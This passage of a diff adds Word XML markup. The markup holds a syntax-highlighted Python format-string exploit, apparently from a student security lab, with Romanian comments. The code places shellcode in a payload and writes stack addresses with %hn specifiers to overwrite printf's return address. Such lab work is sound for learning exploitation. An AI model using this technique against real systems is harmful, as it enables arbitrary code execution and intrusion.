+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>shellcode_32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Put the shellcode somewhere in the payload</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>start</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>344</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#dupa toate variabilele pornite</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>start</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>start</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>############################################################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Construct the format string here</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>############################################################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">##serverul tipareste the addres o frame pointer =&gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ffffd05</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman" w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="22"/>
+          <w:highlight w:val="black"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>are e pusa imediat pe stiva</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>## adresa de retur a lui pritnf este deci =&gt; 0xffffd334</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#incercam sa suprascriem valoarea adresei de retur cu adresa de unde incepe shellcode-ul in buffer, care incepe cu 0xffffd410 =&gt; + formatori +&gt; ffffd5f8 =&gt;adresa </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># inceputului de shelcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">##scriem adresa 0xffffd334 la inceput </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>address1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ffffd054</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># prima adresa a valorii</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(address1)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>to_bytes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>byteorder</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'little'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># se pune adresa in stringul de input</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>dummy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"xxxx"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># se formeaza un octet pe care il afisam intre cei doi specifcatori %hn si %hn cu %x </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># si padding-ul corespunzator constructiei valorii pentru a doua adresa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
